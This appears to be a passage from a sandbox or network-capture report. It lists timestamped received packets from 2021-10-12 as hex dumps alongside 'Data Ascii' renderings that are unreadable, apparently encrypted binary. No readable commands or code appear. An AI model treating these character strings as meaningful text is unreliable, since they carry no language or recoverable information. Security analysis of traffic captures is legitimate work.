                                                                                                                              2021-10-12 14:35:51 UTC51INData Raw: c6 d6 1c 4b d9 60 24 65 46 21 8e fb 99 7d 5d e8 ae 4b e6 03 ca 53 73 19 e5 7c 5e 16 da af cb 55 38 73 af 0e 43 24 1c c1 d8 8e 8b 29 19 a7 3b e8 02 ad b9 ab f3 5a 9b 58 65 27 57 d6 d7 5a fa 5f 72 30 f9 32 ab bf ac c7 b2 45 1b 7a 30 1e 9d 7f e0 a0 42 fa 0d dc b2 2c 3c 3b d8 0d fa 24 1f 79 e1 0d 95 05 3b 73 fb f6 b4 53 f6 15 d4 eb c6 ed 9a da 3a 0b 22 66 03 a0 5c 33 f9 1f 2c d6 a1 d1 84 76 f7 14 91 20 db d8 48 3e 05 68 50 81 20 0d e5 23 fe df 64 45 14 bd f5 84 e3 08 2b d8 00 6f 15 b4 52 46 1c db 84 e6 13 08 a3 da 56 7d 7f 34 38 ca 66 83 10 3d 21 25 a2 bf 0f 6a ad ca 24 35 21 a4 2f 50 2e fc a7 2a a4 c4 29 0f f0 0c f7 5d 17 52 4e ad 31 1f 8b ba c4 7f dc 44 aa 2b 59 f1 ec c6 93 8d b3 f2 94 5e 7a a2 ae 5b b8 9a 3a 4c 8d db 27 c7 e0 3f fa 31 6d b9 31 59 98 41 e9
                                                                                                                              Data Ascii: K`$eF!}]KSs|^U8sC$);ZXe'WZ_r02Ez0B,<;$y;sS:"f\3,v H>hP #dE+oRFV}48f=!%j$5!/P.*)]RN1D+Y^z[:L'?1m1YA
                                                                                                                              2021-10-12 14:35:51 UTC52INData Raw: 3c 44 1a c6 69 b1 0a b1 3e 8b 37 1b c3 9e cc ba 1a 3a 2d f5 af 50 3b 35 77 fd d5 1f 00 be 10 a2 34 1d 16 b1 15 3e 4c 54 0a bf 3c 8c b0 fa 8d 45 25 87 48 fe fc c2 20 8e 9e 41 53 e8 70 3d 9a 12 5e d7 e9 93 ee 38 d6 e6 7e 11 05 e3 2f cb 3f 8b 80 a0 1f 63 c5 97 14 b5 94 f9 21 c7 e6 70 22 20 ad 38 47 b2 ab da 08 e7 2f 17 ae 3c 39 47 44 0b d3 e0 ef 00 2b 89 6f 38 7e f5 87 c9 b0 40 0c 62 bb a8 25 85 cb 77 84 15 83 0c 8a 81 10 8b ec 6b 0b 1b fb 82 94 6e 0a e3 b5 84 29 91 ca e0 01 de 91 e7 f8 b4 b1 b5 0a c2 72 06 2b 8b 92 c8 46 cc 6b ca 0b 6c 3f fe 8a 6c 5c 71 3c f6 fb dc 47 02 bc 6a be 6a 93 80 bf ce 89 ed af c8 c6 2e ec 01 c8 bf 54 fc cc e8 bc 12 c5 30 89 b8 bc c3 6b 77 ce c9 ba 6c 1e 6f ae e6 f8 ce a3 91 72 5b c4 ea 08 9d 7a 1a 4b 66 bc 22 38 65 5f c7 d7 29 69
                                                                                                                              Data Ascii: <Di>7:-P;5w4>LT<E%H ASp=^8~/?c!p" 8G/<9GD+o8~@b%wkn)r+Fkl?l\q<Gjj.T0kwlor[zKf"8e_)i
                                                                                                                              2021-10-12 14:35:51 UTC54INData Raw: 07 15 67 44 a7 d6 dc 3e 8c 40 48 c9 09 6c 25 9b eb b7 28 56 87 b1 5c 7c 21 d8 5c 1c d8 cd e0 54 2c 7d 3e 12 a8 e6 63 95 33 27 1a 34 2d da a2 81 57 8a d2 00 e2 2e 89 c7 fa e2 5f b9 68 b8 32 74 eb f6 72 be 54 61 37 9d 12 83 54 a5 cc 9c 68 0d 52 7e c1 9f 73 dc 3d 07 dc 0f dc f5 09 3a 13 37 0e fa 22 29 53 e3 0d f0 02 2a 75 28 e2 b5 53 ea 04 de 84 01 ed 9a d0 00 c0 dc 99 fa 7e 4a 22 3d 6b 17 d6 75 d1 a8 7a f3 1e e4 1b c1 d8 49 50 41 58 55 8b f8 1d ed 34 46 cc 6c 45 0a bf f9 32 a1 37 51 26 ff 81 ce be 7d 90 2a f7 8c e5 1a d9 dd 7f 5d 6e 70 3f 01 f7 7b 7d 1b cf 26 35 82 a6 36 6f ad 9a 15 2a 2a 58 2e 7c 27 a3 b6 2e 95 ea 37 03 e3 a9 f6 4c 12 5b 47 53 30 33 83 bc d3 a9 d6 5b a0 3e 5c f1 fd 00 8c 73 b2 17 a7 56 78 be b4 34 57 80 3a 46 93 d0 3f ed e1 57 f1 32 6b db
                                                                                                                              Data Ascii: gD>@Hl%(V\|!\T,}>c3'4-W._h2trTa7ThR~s=:7")S*u(S~J"=kuzIPAXU4FlE27Q&}*]np?{}&56o**X.|'.7L[GS03[>\sVx4W:F?W2k
                                                                                                                              2021-10-12 14:35:51 UTC55INData Raw: af c4 e1 32 8f 3c 4f 0d ed 79 a3 4a a1 2c 9c b8 1a ef 8c a7 13 08 3a 36 ed ce 4b c5 34 51 da 1c 11 11 b6 89 7a 36 f1 16 bb 38 26 62 4c c5 a0 2c 9e ad da 98 4c 06 a1 4c d6 4b d0 24 82 98 77 78 fa 70 26 55 07 a1 d6 c5 e7 ac ab d6 ec 5c da 03 fe 3a ce 50 a7 92 bf 31 91 cc d4 b5 a5 9c db 2e ca f5 78 5b 19 a2 00 83 ad 8e c9 0b e9 2f 08 2b 26 c2 38 54 0c c5 f9 ca c6 22 9a 7b 29 6a cf bc d2 4e 4b 37 0b ad e9 3a 93 cb 63 ac 17 90 13 8d 6e 17 8f 3e 79 02 0e 85 2f 9b 7d 12 97 b6 96 36 9c 5b f9 2c d4 8a fe e4 3f a4 91 ce d6 61 12 44 28 81 d7 42 46 78 e6 0c 61 3f e9 84 65 67 bf 3f e7 ef ac eb fd bd 4c c0 69 83 97 72 ce 91 e0 b8 ca dc a0 4a 04 0c 69 53 d0 cb ca be 1b cb 31 b2 4a bc d2 7f 7b cd 44 99 42 17 51 8d 13 16 3b ad 9f 49 97 c4 fb 1c ed 45 e6 4a 4c bc 39 25 01
                                                                                                                              Data Ascii: 2<OyJ,:6K4Qz68&bL,LLK$wxp&U\:P1.x[/+&8T"{)jNK7:cn>y/}6[,?aD(BFxa?eg?LirJiS1J{DBQ;IEJL9%
                                                                                                                              2021-10-12 14:35:51 UTC56INData Raw: 18 af cf 13 20 0a 11 61 f6 f5 c6 d7 25 8b 40 0f eb 0a 6c 29 96 27 f0 83 57 87 b1 46 f7 02 ca 4d 86 f6 ef 78 54 2a 18 af 34 aa ec 74 b5 11 26 08 ca 5b f1 a9 83 38 11 bd fe e8 02 a6 89 d0 86 4b 9a 95 ab a8 64 ef eb 4b ea cf 0e f4 8a 88 a1 a8 7c a3 75 7d 1b 70 29 c5 8e 72 db b7 7f 2c 97 ca e2 13 2d 2b cd db 60 4b 8f 79 e1 07 ee de 54 9c 47 f7 be 40 e6 66 f6 e9 c6 eb 89 cb 2b 0e 4d af 05 a0 56 29 06 30 3d c7 7d bf ac 74 e2 12 80 31 d0 de 27 1b 14 58 53 90 35 1d e0 4c b6 dd 64 52 13 bf d8 b0 12 08 2d b7 2a 7c 10 ad 5e a9 0c 98 99 ee 09 d4 bf d5 4a b8 69 24 38 df 6a 6a 2f 0c db cc 57 b0 15 78 7b c8 28 3b 23 4b 3d 42 84 08 49 d1 4b b5 13 2b d4 09 f7 46 01 5f 34 e9 30 33 89 b1 fb 91 d6 5b aa e6 5e f7 d7 ca a7 73 f3 c2 a6 56 78 ab b4 34 76 9a 3a 46 57 c9 0f e8 07
                                                                                                                              Data Ascii: a%@l)'WFMxT*4t&[8KdK|u}p)r,-+`KyTG@f+MV)0=}t1'XS5LdR-*|^Ji$8jj/Wx{(;#K=BIK+F_403[^sVx4v:FW
                                                                                                                              2021-10-12 14:35:51 UTC57INData Raw: f0 17 11 aa c6 86 e5 ae a1 8f 36 68 0a 85 d0 b1 4a ba 35 56 9b 1b c3 8f ae 05 32 66 27 ff d7 61 32 1d 9e d6 0d 1a 28 5c 04 cd 0f 35 4b bb 38 3f 59 5b de 88 db 8f b0 22 b1 87 0e b0 4e d6 ab d1 24 8e 86 6f 62 c0 98 34 47 1d 77 3e ea ed d4 10 8b ec 56 cf 15 eb 20 f4 4c b2 80 a6 3d 72 c9 f8 a3 9c c9 f3 2c c8 e6 79 3d 1b be 04 85 b4 83 c5 1d e9 38 32 69 2f 3c 3f 74 1a db c2 e9 db 28 8f 7f 01 55 dd a3 c3 a6 64 48 7e a4 aa 25 89 cb 78 bd 0f 93 08 a8 75 15 a3 30 79 0d 35 b3 30 95 64 6f bf a5 84 2f 9b ac e9 08 b1 bf f6 f3 a3 a6 94 c0 c6 1d 26 46 39 95 d9 45 90 59 ce 0b 71 43 d3 99 6a 72 ab 2e ff 92 a6 f4 03 b6 be c5 5d bb b7 a4 dd 8b ec ad f1 f6 a0 5b 1c cc 97 8c e9 e9 eb 9a 15 d4 32 b2 53 cf 79 6d 64 cd b1 b0 56 1e 69 b7 32 eb c2 98 93 70 85 c4 ea 4f c6 52 18 4b
                                                                                                                              Data Ascii: 6hJ5V2f'a2(\5K8?Y["N$ob4Gw>V L=r,y=82i/<?t(UdH~%xu0y50do/&F9EYqCjr.][2SymdVi2pORK
                                                                                                                              2021-10-12 14:35:51 UTC59INData Raw: 12 35 a8 5c ed 1a f0 e9 23 20 01 00 7b 7f e4 c6 d8 1c 07 da 60 28 15 7c 0b 67 fc 9f 66 46 81 61 5d 3c 16 f4 4c 1b f6 79 7c 54 26 68 41 1c 43 e7 65 b4 d6 29 26 41 1b ca a7 8f 29 12 fa ea e9 02 a6 5a a3 f3 5a 90 ac 88 33 72 f4 ec 4b fc 42 b7 2e 8c 99 ad ae af f2 a4 82 e4 85 32 e8 03 79 ca ad 62 24 1f f4 c4 18 3c 31 f2 23 f8 24 40 73 c9 35 f6 04 31 ad 47 f1 9e 53 e0 54 c8 eb c6 ed 9a da 3a 0b 22 66 05 da 5d 33 37 64 2d d6 75 c2 84 76 e2 0e 91 20 c0 c3 78 38 16 5e 54 81 24 72 e5 23 81 dd 6e 56 14 c1 11 bd 16 02 34 87 33 76 12 bc 37 b0 1c f7 86 e5 0f f6 32 c5 5d 64 52 52 28 cf 71 70 62 37 25 33 a2 b2 1a 7e ab cf 09 02 2e 5a 28 6b aa f2 b6 2e 94 b3 3e 12 eb 1f 89 28 12 4d 43 f1 21 3b 97 a8 fb 60 d7 5b aa 29 5a e5 d5 ea 89 73 b4 c9 2b 51 78 ab b5 27 5f 8b 32 50
                                                                                                                              Data Ascii: 5\# {`(|gfFa]<Ly|T&hACe)&A)ZZ3rKB.2yb$<1#$@s51GST:"f]37d-uv x8^T$r#nV43v72]dRR(qpb7%3~.Z(k.>(MC!;`[)Zs+Qx'_2P
                                                                                                                              2021-10-12 14:35:51 UTC60INData Raw: 3d f5 5a b1 96 f1 1d 08 87 4b 83 cd 95 b2 89 35 6d 96 f5 6a b7 62 9e 3c 8b 40 33 26 8e bf 0a 32 a6 27 ff db 7f 3f 33 55 25 0e 1c 06 90 29 cf 09 1b 3e 5e 39 39 40 77 4b a0 3d 86 a3 23 9f 48 9a b3 48 f8 de ff 26 88 93 41 8e e9 70 3d 6f 87 5f d7 e3 fe d7 29 d0 c4 78 cb 06 e5 3f f4 7e b6 80 aa 03 91 cc e9 a2 9c ba f1 2c c8 e3 56 1a 33 a0 0a 93 4c aa 85 35 ee 2a 16 e9 88 3c 39 78 1a d5 c2 e9 db 28 8f 7f 01 55 dd a3 c3 a6 64 5b 7e a4 aa 25 89 cb 79 bd 0e aa 5b 82 90 10 cc 1e 6a 0b 1b 85 38 84 68 6f b3 a5 84 2f 9b ad e9 04 f6 99 f5 f3 a3 d8 bb d3 c1 74 11 4c 11 d0 cc 4c be 16 e0 09 77 2a fe 8a 62 1b b8 3e f6 f7 6d a0 70 9e 62 ca 7e 80 89 b5 d4 a9 a8 a5 d9 c8 cf 73 14 12 91 43 f5 dd c4 c2 31 d6 38 a7 49 b5 d2 68 4c c5 bb 98 68 71 4f bf ec ef d5 bb bc 19 81 c4 ec
                                                                                                                              Data Ascii: =ZK5mjb<@3&2'?3U%)>^99@wK=#HH&Ap=o_)x?~,V3L5*<9x(Ud[~%y[j8ho/tLLw*b>mpb~sC18IhLhqO
                                                                                                                              2021-10-12 14:35:51 UTC61INData Raw: 67 3a f0 fa 2d 2e 23 bc 72 5f 17 e1 e7 64 15 03 00 77 7d ee d0 b3 12 99 da 66 33 07 44 6a 8a fd 99 03 7d 85 bb 4c e0 18 d6 32 09 df e5 76 8a 39 52 79 03 aa e6 6f ad 0e 45 a5 1c c1 d3 af af 00 17 d2 0a 36 3b bd c7 eb 25 49 80 95 aa 23 60 70 57 65 22 ab 9e c2 9b 8e bc 69 b5 ca 8b 7b 0a 6a 04 4b 61 86 35 79 7d df 25 eb f3 18 36 28 d5 7e 40 24 46 73 ec 25 ce 04 3b 79 99 f5 b2 79 e9 3f d4 eb 87 d9 9a da 3a 0b 22 66 c0 a0 5c 33 ea 1e 2c d6 d7 d1 84 76 f7 14 91 20 db d8 48 3e 16 58 55 81 76 0c e5 23 17 de 64 54 db af f0 bc 03 08 2b d8 1a 7e 10 aa 4b 88 1e f7 7b ef 09 de 2a c5 5d 7f 6c 27 2f f7 b1 7d 11 11 24 22 ae be 15 91 ac f7 29 23 3d 8c 23 63 2d e6 b0 2e 84 a6 29 09 1d 08 db 45 1b 5c 42 61 06 2c 88 af d5 a9 c7 5d b8 c6 5d dd f4 eb a3 71 b2 d8 ad 4f 6b ad b4
                                                                                                                              Data Ascii: g:-.#r_dw}f3Dj}L2v9RyoE6;%I#`pWe"i{jKa5y}%6(~@$Fs%;yy?:"f\3,v H>XUv#dT+~K{*]l'/}$")#=#c-.)E\Ba,]]qOk
                                                                                                                              2021-10-12 14:35:51 UTC63INData Raw: 07 0b 22 27 a2 e4 f5 5c 99 ef e1 1a 1f 8f 45 83 cd 9f 3d 9e 3b 5b 1e 87 f6 a0 4d af 37 ab e5 1b c3 8f 23 11 1d 25 2d df 68 6c 3b 35 e1 c4 0a 03 0b 98 e1 cd 09 1d 8a aa 3f 26 46 40 84 3c 2c 8b af 29 86 1a 91 a1 4f e1 f8 f1 b1 88 95 69 f7 f9 77 28 48 04 23 4b f8 ea cd 28 c0 70 47 ce 19 f2 3f 40 41 b1 9f b2 03 f3 dc ff ba a7 82 6f 3d c9 ea 6a 22 af b1 07 9a a7 bd 46 08 ee 21 0c 14 d0 3c 39 78 97 c2 ed d8 ce 3e 15 78 2e 64 c5 b5 55 a1 4d 04 14 a6 28 25 8f d8 ed bd 01 9d 16 96 0c 07 a4 29 73 1d 81 85 37 8a 72 16 0b b6 83 36 97 85 78 00 de 9b 68 e2 a2 a8 83 f1 41 72 00 44 a5 82 cf 53 a7 6f 56 1a 70 33 d9 bb 95 74 ad 3f 6a ec b4 ea 22 aa fc db 7f 8c a2 b2 41 90 f8 b8 fa d8 3c 4a 11 0d b3 72 7c cc c3 ad 89 c5 3f be 7d aa 5f 7c 63 d8 9c b8 ee 1e 69 bd 70 f8 c3 ad
                                                                                                                              Data Ascii: "'\E=;[M7#%-hl;5?&F@<,)Oiw(H#K(pG?@Ao=j"F!<9x>x.dUM(%)s7r6xhArDSoVp3t?j"A<Jr|?}_|cip
                                                                                                                              2021-10-12 14:35:51 UTC64INData Raw: 4e 05 36 4e 02 60 03 a5 f6 42 00 4e 0c 75 4e 10 52 f2 12 28 7f 3c 71 6c e9 ff 85 30 9b dc 0f 92 0b 6c 29 2c ec 86 60 5f 94 aa 5c f5 19 e3 83 1e de e5 6d 45 3d 67 cb 39 a3 df a9 bc 00 36 16 73 70 d8 a2 8d 2b 04 c4 13 fa 3a 1d d4 fc f3 4b 82 95 a9 a8 61 fa e9 4b fe 3a d1 3c 8a 82 b8 ba d5 ad 9b 7d 11 69 3c d1 9a 51 90 a3 68 fc 62 6e f2 18 36 2f 24 0c ec da 47 68 e4 25 ad 00 3b 75 28 45 b5 53 ea 01 2a ea d0 13 9b cb 3f 23 7e 62 05 a6 33 81 36 1e 26 c2 8b d1 92 88 e3 74 80 25 e9 85 4c 3f 10 37 e7 80 24 06 f1 dd 91 c9 9a 55 62 bf f5 94 48 0c 2b de 6f cc 11 ab 52 ac e3 f6 9a 11 08 be f1 fc 4b 6c 7a 34 5a ed 79 7d 17 02 2e 29 25 b4 1c 6f ac c8 3b 3b 30 4c 06 27 23 f5 b0 8c 84 ba 21 2b bf 0d f7 4a b0 5c 5d 4b 18 6e 87 bc d5 0b c7 41 b9 10 02 f5 fd c5 2f 62 a8 cd
                                                                                                                              Data Ascii: N6N`BNuNR(<ql0l),`_\mE=g96sp+:KaK:<}i<Qhbn6/$Gh%;u(ES*?#~b36&t%L?7$UbH+oRKlz4Zy}.)%o;;0L'#!+J\]KnA/b
                                                                                                                              2021-10-12 14:35:51 UTC65INData Raw: 10 27 a2 d9 20 8d 13 ab 8c 95 e5 e6 42 8a 79 db 04 13 ab c6 89 c4 8e ab 15 14 2c 05 f6 6c 99 6e b0 3e 81 e4 0a c9 98 69 13 10 2b 2d ee cf 5d da 3d f3 62 1b 2d 37 ae 14 c6 00 93 a1 aa 3c b7 fd 48 0d b3 22 9f bc 0f 86 71 09 a1 44 f6 e7 da be a0 ff 6d 6b ee 58 13 47 1b 55 75 f8 e6 c5 ee c5 e7 47 c5 11 35 3a d0 41 ba 91 bf 24 b4 be 17 a4 b4 9e e0 25 df f1 6d 15 25 b3 20 bd 00 ae da 19 f8 1f 0b 14 b5 2f 2c 69 1e ca fd de aa d8 88 69 23 68 cc b2 d8 a4 62 9a 0f 86 ae 33 02 df 71 ac 07 96 18 94 b8 b5 a3 36 62 23 47 94 30 9f e2 3f 97 a7 85 3a 98 b4 ea 17 52 a4 f4 f3 a4 9f 2b d1 c1 78 28 1e 39 93 c2 5b 6e f4 e1 0b 77 2d ea 95 7c 67 a0 29 e5 ee 9b db 01 bc 66 d9 77 85 93 b0 ae a3 fd a7 df dd b0 4a 07 06 bf 39 f8 cc c5 b4 98 d3 38 a1 59 af e1 7c 46 d1 ab 96 46 0f 69
                                                                                                                              Data Ascii: ' By,ln>i+-]=b-7<H"qDmkXGUuG5:A$%m% /,ii#hb3q6b#G0?:R+x(9[nw-|g)fwJ98Y|FFi
                                                                                                                              2021-10-12 14:35:51 UTC104INData Raw: 28 90 78 b7 8a 8b 8a fe 5e 66 26 3b ef 9c ed d6 f6 60 5e 16 5c 81 86 f6 55 fe 8a a4 94 88 70 b5 58 aa 8f e9 27 9c aa 1d e5 69 f4 7c ed 4f bb c8 db f6 56 dd b1 fa 96 90 a5 e0 14 ba e4 24 17 92 3d 8e 52 98 73 f4 14 6d 31 d5 83 c7 80 83 9c 34 45 10 fe 75 ba b4 b1 12 9b 42 1d d5 89 31 b7 75 61 27 ff db 67 24 39 6e dd 0d 0d 08 a7 15 33 08 31 1c aa 3e 2e 9d 4c d1 bf 2e 9f b8 24 88 68 12 a6 b6 ff da c0 27 d8 ee 70 6a e8 74 29 07 8e a2 28 16 f2 c5 2b de ec 47 c1 11 1d 28 f0 53 ae 93 a8 15 7e c5 e1 5b b5 b8 f5 3a dd f0 64 27 3b a0 11 8d ad b2 24 18 c5 30 19 64 3e 39 57 05 10 d2 ea c3 c6 32 9a 61 29 6a d5 bc c3 4e 4b 37 01 85 f8 30 f2 f8 70 ac 02 9d 07 93 98 16 b2 3e 7e f5 1c b8 33 82 7d 08 97 b6 8c 36 ae 5b f9 2c dc b0 f1 cb 65 4b 62 2e eb 72 00 44 2a a3 cb 4c c4
                                                                                                                              Data Ascii: (x^f&;`^\UpX'i|OV$=Rsm14EuB1ua'g$9n31>.L.$h'pjt)(+G(S~[:d';$0d>9W2a)jNK70p>~3}6[,eKb.rD*L
                                                                                                                              2021-10-12 14:35:51 UTC105INData Raw: 47 5b 64 a8 aa 35 cd 1e 98 75 6d c2 e8 dd 7f 57 ae 58 e0 f5 8a b7 0e 68 f0 31 72 5f 61 b7 22 d5 73 fa 29 73 77 73 e5 87 fa 79 45 63 5d f5 08 57 d1 71 26 82 33 24 5c 69 e7 d9 e1 57 57 09 56 11 62 2b ec fa 5d 0f df bd 58 41 19 f8 fc 01 e7 29 8b 73 6c e9 da c3 3e 88 d2 60 33 02 73 33 70 fc b3 7d 52 fc a6 4b e6 0d ce 33 5c 89 1a 83 ab 33 66 42 3c aa f7 6d a1 14 c8 1e 30 d1 da aa 98 32 c1 fa 8b ea 02 a6 c5 f9 ec 4f 82 8c bb 23 7a e1 eb a4 fb 79 6d 34 95 90 ef 96 59 33 65 62 17 69 32 c0 8e 71 d3 59 69 d6 03 d8 f0 96 8b 21 00 1a 20 37 41 75 fb 1e fe 04 2a 7b 58 e4 4a 52 cc 1a d7 e3 d8 3b b2 51 38 0b 28 75 03 bf 48 20 3f 1e 3d de 6a cb 7a 77 ce 1d 99 31 c6 e9 20 20 0a 4b 5d 81 35 04 fa 2c 6e de 48 40 07 ad f8 a3 02 de 03 e3 01 7e 1a d6 44 b9 1d f3 93 ff 1a d6 ae
                                                                                                                              Data Ascii: G[d5umWXh1r_a"s)swsyEc]Wq&3$\iWWVb+]XA)sl>`3s3p}RK3\3fB<m02O#zym4Y3ebi2qYi! 7Au*{XJR;Q8(uH ?=jzw1 K]5,nH@~D
                                                                                                                              2021-10-12 14:35:51 UTC107INData Raw: 28 b8 66 f9 b3 0c ca 76 a7 88 85 06 17 56 79 39 ed dd b1 fa df a4 60 4c 16 5c 81 ea 3d 2c e5 81 28 01 b6 a4 b4 4e 82 0c f7 34 9e 86 08 fb 7d d4 0e c3 57 8b 29 ca f7 56 c6 ba f8 9a 87 de 32 bc 8c cc a8 10 82 3f f4 21 89 72 f0 19 00 d4 d9 82 cd 9b a8 99 53 d5 03 f6 60 97 48 cb 30 8a 46 1f c1 f4 af 01 1a 3e 31 ee d5 db 54 6e 7d d5 07 3a 02 c3 09 cc 09 19 1f ad 57 a9 48 5f dd 86 2a 86 6e 06 9b 1b 03 b1 48 fa 99 57 26 88 9f 7f 01 d5 18 c9 b8 e4 81 db c1 da d2 38 dc c4 6e c9 06 e9 f7 dc 46 9c 86 8a 54 73 cd f8 a5 b4 94 f3 3e ce f5 7e 82 32 a0 00 4d b3 ab da 15 e9 3e 1a 2e 2f 3c 38 6b 3b d1 ea ef d9 28 89 61 29 7b cc b5 c2 9b 51 1b 0a 91 56 24 a3 da 69 a7 06 85 1a 7e 91 3a a1 21 63 0b 1a 8c ce 94 42 02 bc a5 af ca 88 de e2 01 de 9f de 89 a7 9f 8a d1 c1 78 02 5b
                                                                                                                              Data Ascii: (fvVy9`L\=,(N4}W)V2?!rS`H0F>1Tn}:WH_*nHW&8nFTs>~2M>./<8k;(a){QV$i~:!cBx[
                                                                                                                              2021-10-12 14:35:51 UTC108INData Raw: e3 5b c4 ee 75 ef 51 77 a6 b2 28 f6 fa 9c 64 63 cb 7f 24 7e 7b a7 44 e3 37 91 80 b2 7b f8 3b 45 7c 24 bd c8 fc b2 ea 2c 76 69 e1 ee 51 d2 43 50 77 43 a0 b0 56 d1 7f 2d a4 ce 28 5c 7e f9 43 18 56 7b 0b 5a 16 7e 03 5e f2 42 0c 09 ad 74 4e 10 fc eb 1f 19 ee 04 71 6a f4 5a db 34 9b db 73 26 1b 68 35 a6 0d 9b 6c 51 25 aa 4e f2 1d cf 75 bf de e5 76 7c 99 77 51 3e 86 e4 4e 86 07 22 37 f1 c5 d9 a4 91 b5 10 d2 00 e9 16 b8 c2 d4 50 5a 91 8e af 1a 83 fa e0 5c ec d8 66 3d 8a 89 bf ab b2 e4 39 7d 1b 70 12 74 9f 79 c0 8f dd fa 0d d6 c9 76 c3 c4 25 0a ee 0c b4 7d e1 0b e0 89 3c 73 47 f6 a0 47 f4 3d 77 eb c6 e7 b2 80 3a 0b 28 6c db b0 79 1b 00 1e 2c dc 78 c6 8e 5e da 14 91 2a 1f d8 4e 15 16 58 55 c0 38 0c e5 23 90 df 64 54 02 ae f0 4f 17 08 2b 2b 01 7e 10 bb 58 b8 1d ed
                                                                                                                              Data Ascii: [uQw(dc$~{D7{;E|$,viQCPwCV-(\~CV{Z~^BtNqjZ4s&h5lQ%Nuv|wQ>N"7PZ\f=9}ptyv%}<sGG=w:(ly,x^*NXU8#dTO++~X
                                                                                                                              2021-10-12 14:35:51 UTC109INData Raw: e3 8f a3 a2 cd 2f d7 c3 f0 6d 2c d6 76 cd 5e 83 8a e5 6c 00 c7 3a 11 6e ec c4 b7 6e 79 17 5c 84 a9 aa 3f f4 fe 9f 90 b6 a5 da 0f aa 90 fc e8 bc 5f 08 ed 71 20 7a eb 46 83 54 9a 92 56 c2 ba e9 9e 90 99 e8 0b 9b 11 25 3b 82 07 f5 5c 99 7f f0 1d 02 af d7 83 cd 9d a1 8f 3c 01 01 f6 6a 9b 4b b0 3e e5 47 1b c3 99 bf 00 1a 3a 27 ff d1 6e 3b 35 7d 5e 0c 1c 00 a0 07 cd 09 be 17 bb 38 35 4a 5f d7 a0 3d 8c b0 26 99 60 0d 09 49 fe f6 4b 24 88 95 3a 69 e8 70 21 47 1b 5f d7 e9 ed d2 23 e6 e5 56 3c 04 e3 29 30 50 b6 91 be 98 44 cd f8 a4 a7 9d 80 87 ce f5 74 27 35 b1 06 91 9a 2f d8 19 ef 29 97 33 2f 3c 38 6b 05 c2 e4 d1 c8 21 2b 78 27 68 d2 b2 c6 a4 5e 0c 80 a9 a8 25 8e cb 61 bd 16 94 1b 1c 81 06 b4 1e cf 0b 1d 9e 16 84 7e 16 07 8b 9b 38 85 b3 62 28 cf 9b f4 f9 75 a5 9d
                                                                                                                              Data Ascii: /m,v^l:nny\?_q zFTV%;\<jK>G:'n;5}^85J_=&`IK$:ip!G_#V<)0PDt'5/)3/<8k!+x'h^%a~8b(u
                                                                                                                              2021-10-12 14:35:51 UTC111INData Raw: fa 1d 4c f7 61 f7 70 85 f9 51 47 51 77 ac b5 3c de 16 ff 03 65 c8 e8 23 7e 7a bd 60 f4 23 2a a8 15 7b 16 31 63 46 56 bd d9 d4 59 9d 97 72 7f 66 e5 59 bd fe 46 63 5d 85 6d c5 d1 75 33 87 29 43 3f 78 ef c4 0c 50 50 52 5f 04 05 4f fd f2 48 72 63 bc 74 4f 09 f4 e4 75 a2 01 00 7b 03 fa d6 dc 3e b7 f6 71 26 22 64 26 8e fb f0 ac 55 87 b1 62 53 09 db 57 30 cc f4 78 7c 25 72 51 32 c5 26 67 be 0a 59 0a 1c c1 d3 a9 96 3c 78 13 02 e8 08 ab fe 19 f0 5a 97 fa 28 32 72 f4 8f 22 fa 55 6b 36 9b 8e c4 d9 a6 cc 90 50 84 a4 36 d1 99 55 cd b6 6e 95 5a dc f3 12 e0 3c d0 d3 ef 01 6e 4e e1 0d fc 17 3e 5b 4d f2 b4 55 ea 3d ec eb c6 e7 44 da 3c 21 23 7a 05 a0 5e 33 2f 1e 41 53 75 dc 84 76 e2 14 91 20 c1 d8 dd aa 16 4d 4f 81 24 0d fe 13 98 df de 54 02 ae 1f bc 16 19 03 d3 05 7e 16
                                                                                                                              Data Ascii: LapQGQw<e#~z`#*{1cFVYrfYFc]mu3)C?xPPR_OHrctOu{>q&"d&UbSW0x|%rQ2&gY<xZ(2r"Uk6P6UnZ<nN>[MU=D<!#z^3/ASuv MO$T~
                                                                                                                              2021-10-12 14:35:51 UTC112INData Raw: f8 29 6c de 28 8d 7b a8 8a ec 07 c0 c8 fb b9 2e 90 65 a2 9f ab a4 ed 56 7f 57 bd ee b0 f0 d8 a4 1d 2d dd 5e 85 8f b9 22 ff 9c cb 64 b7 a4 b3 4e 82 81 f7 34 9e a6 0b c5 66 0f 7d c7 29 9a 55 db fc 6f 75 b9 e9 9e b8 a6 ed 0b 9d 17 2c 13 91 3a f5 5a f6 6a f1 1d 08 83 db 8a e5 8b a4 8f 3a 6d 25 f6 6a bb 47 b2 38 e4 8c 19 c3 85 a0 38 00 2c 48 0b d0 6c 3d 1d 6a d4 0d 16 28 ef 05 cd 0f 35 38 b9 38 3f 25 27 d7 a0 37 a4 85 26 99 6a 1e b7 5f ed fe e9 75 89 95 69 7a ef 72 4c 70 1a 5f d3 86 26 d0 38 dc 36 4e 11 11 39 3e 0a dd a3 80 a0 14 7c c4 ee b4 b3 96 88 1b cf f5 7a 5b f8 a2 00 8f 68 b3 02 0e 33 2d 0b 27 25 17 01 69 02 c2 e0 c5 df 47 43 6b 29 71 d5 b2 c1 68 52 cd 1c 8c b0 fd 59 c0 66 c3 f2 83 0c 86 b8 01 a2 36 62 23 4a 96 30 93 46 2e 95 a7 82 46 f2 a5 f8 0a 7c 8a
                                                                                                                              Data Ascii: )l({.eVW-^"dN4f})Uou,:Zj:m%jG88,Hl=j(588?%'7&j_uizrLp_&86N9>|z[h3-'%iGCk)qhRYf6b#J0F.F|
                                                                                                                              2021-10-12 14:35:51 UTC113INData Raw: e2 66 08 dc 4d eb 1a 4d 79 ce fe 57 04 23 32 bc 50 77 aa aa 37 cd 1d 98 75 6e c2 ef dd 7f 57 b6 41 f1 20 8f bf c3 ea 97 ca 62 57 78 a5 c2 c7 54 ee 3d 7b 60 60 17 50 fe 4b 7c c3 a9 77 ec 49 dc 66 32 8c 31 27 43 66 11 cf 33 47 7c 65 b2 03 6a 2d ec f4 2d d4 23 bc 7e 51 05 e3 e8 0b 20 0a 1c 8f 6d cf df df 3d 0a c9 6a 3f 19 67 23 9f f6 88 92 56 ab b8 52 f5 02 db 4c 17 c1 fa 82 55 00 64 52 3d bd 30 f4 a9 da 21 c9 91 ea d9 a2 86 34 08 f2 13 e3 02 bd dd e3 de a4 90 a8 a8 31 7b e9 36 cb ed 8f 76 eb 07 a3 ab bf a7 c0 85 53 08 71 3a d1 94 66 d1 59 69 d6 06 af f3 1a 3c 3d c9 0b e5 38 55 72 e1 1c fd 1b 0e 8d 46 db bd 6b 66 14 d4 eb d9 db 89 d1 3a 1a 29 79 20 